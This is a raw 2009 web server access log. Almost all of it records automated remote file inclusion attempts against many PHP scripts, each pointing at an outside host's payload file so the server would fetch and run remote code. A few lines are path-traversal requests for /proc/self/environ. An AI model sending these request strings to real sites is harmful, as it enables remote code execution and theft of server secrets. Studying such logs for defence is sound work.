121.78.116.209 - - [10/Sep/2009:22:17:20 -0500] "GET /logs/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:17:21 -0500] "GET /index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:17:25 -0500] "GET /logs/access_log.1247875200/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:41 -0500] "GET //include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:41 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:41 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:45 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:55 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:55 -0500] "GET //include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:55 -0500] "GET /logs/access_log.1234828800//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:20:55 -0500] "GET /logs/access_log.1233273600//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.48.121.149 - - [10/Sep/2009:22:20:55 -0500] "GET /logs//citywriter/head.php?path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
211.48.121.149 - - [10/Sep/2009:22:20:55 -0500] "GET //citywriter/head.php?path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
211.48.121.149 - - [10/Sep/2009:22:21:02 -0500] "GET /logs//citywriter/head.php?path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
211.48.121.149 - - [10/Sep/2009:22:21:02 -0500] "GET //citywriter/head.php?path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
58.184.252.3 - - [10/Sep/2009:22:24:57 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.4.8.14 - - [10/Sep/2009:22:26:14 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:26:14 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:26:45 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:26:45 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:28:35 -0500] "GET /logs/access_log.1244764800//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:28:35 -0500] "GET /logs/access_log.1237075200//include/bbs.lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.27.203.107 - - [10/Sep/2009:22:29:45 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:29:52 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:29:52 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:29:53 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:29:55 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.27.203.107 - - [10/Sep/2009:22:30:01 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:30:06 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.7.173.20 - - [10/Sep/2009:22:30:06 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
65.55.207.29 - - [10/Sep/2009:22:30:37 -0500] "GET /logs/access_log.1113091200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.184.252.3 - - [10/Sep/2009:22:31:19 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.184.252.3 - - [10/Sep/2009:22:31:20 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.55.106.187 - - [10/Sep/2009:22:33:08 -0500] "GET /logs/access_log.1249430400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.144.100 - - [10/Sep/2009:22:38:28 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:38:28 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:38:28 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:38:52 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:40:09 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:40:09 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:40:09 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:40:27 -0500] "GET //ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:40:27 -0500] "GET /logs/access_log.1239667200//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:40:27 -0500] "GET /logs//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:40:39 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:40:40 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:22:40:40 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.184.252.3 - - [10/Sep/2009:22:40:45 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.184.252.3 - - [10/Sep/2009:22:40:51 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.184.252.3 - - [10/Sep/2009:22:40:56 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.4.8.14 - - [10/Sep/2009:22:42:14 -0500] "GET /logs///administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:42:38 -0500] "GET //ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:42:38 -0500] "GET /logs/access_log.1244764800//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:42:38 -0500] "GET /logs//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:42:50 -0500] "GET /logs/access_log.1244764800//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:22:42:55 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:43:48 -0500] "GET /logs/access_log.1244764800///administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
65.55.106.179 - - [10/Sep/2009:22:44:37 -0500] "GET /logs/access_log.1109808000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.123 - - [10/Sep/2009:22:44:38 -0500] "GET /logs/access_log.1228867200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.135 - - [10/Sep/2009:22:45:37 -0500] "GET /logs/access_log.1162166400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.4.8.14 - - [10/Sep/2009:22:45:44 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:45:44 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:45:44 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:46:14 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:46:14 -0500] "GET /logs/access_log.1236038400//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:47:58 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:27 -0500] "GET //view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:27 -0500] "GET /logs//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:27 -0500] "GET /logs/access_log.1238112000//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:34 -0500] "GET /logs/access_log.1247788800//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:49 -0500] "GET //view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:49 -0500] "GET /logs//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:49 -0500] "GET /logs/access_log.1238112000//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:22:48:54 -0500] "GET /logs/access_log.1247788800//view_song.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.184.252.3 - - [10/Sep/2009:22:49:01 -0500] "GET /logs/access_log.1244764800///administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
58.184.252.3 - - [10/Sep/2009:22:49:01 -0500] "GET /logs///administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:50:31 -0500] "GET /logs/error.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:50:31 -0500] "GET /logs/access_log.1237075200/error.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:51:38 -0500] "GET /logs/access_log.1241827200///administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
65.55.208.131 - - [10/Sep/2009:22:54:01 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [10/Sep/2009:22:54:02 -0500] "GET /logs/access_log.1249948800 HTTP/1.1" 200 566792 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.146.119.209 - - [10/Sep/2009:22:55:39 -0500] "GET /logs/access_log.1250985600//inc/download_center_lite.inc.php?script_root=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:55:39 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:55:39 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:22:56:08 -0500] "GET /logs/access_log.1248134400//inc/download_center_lite.inc.php?script_root=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:01:00 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:01:05 -0500] "GET /logs/access_log.1236038400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:03:00 -0500] "GET /logs/access_log.1238112000//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:03:00 -0500] "GET //allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:03:00 -0500] "GET /logs//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.113 - - [10/Sep/2009:23:03:07 -0500] "GET /logs/access_log.1212710400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.234.246.98 - - [10/Sep/2009:23:04:24 -0500] "GET //index2.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
205.234.246.98 - - [10/Sep/2009:23:04:24 -0500] "GET /logs//index2.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
205.234.246.98 - - [10/Sep/2009:23:04:24 -0500] "GET //index2.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
205.234.246.98 - - [10/Sep/2009:23:04:24 -0500] "GET /logs//index2.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
114.4.8.14 - - [10/Sep/2009:23:04:29 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:23:04:29 -0500] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:23:04:38 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 200 204585 "-""Mozilla/5.0"
211.233.69.41 - - [10/Sep/2009:23:04:45 -0500] "GET /logs/access_log.1244764800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.233.69.41 - - [10/Sep/2009:23:04:45 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.233.69.41 - - [10/Sep/2009:23:04:45 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.233.69.41 - - [10/Sep/2009:23:05:15 -0500] "GET /logs/access_log.1240358400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.3.134.20 - - [10/Sep/2009:23:06:06 -0500] "GET /logs/ask_password.php?dir=http://xcrew.t35.com/idv6.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
174.3.134.20 - - [10/Sep/2009:23:06:06 -0500] "GET /ask_password.php?dir=http://xcrew.t35.com/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
62.140.23.192 - - [10/Sep/2009:23:06:55 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:06:55 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:06:55 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:02 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:15 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:15 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:16 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:23 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:23 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:24 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:07:33 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:08:13 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:08:28 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:08:28 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:08:28 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:08:40 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:07 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:07 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:07 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:18 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
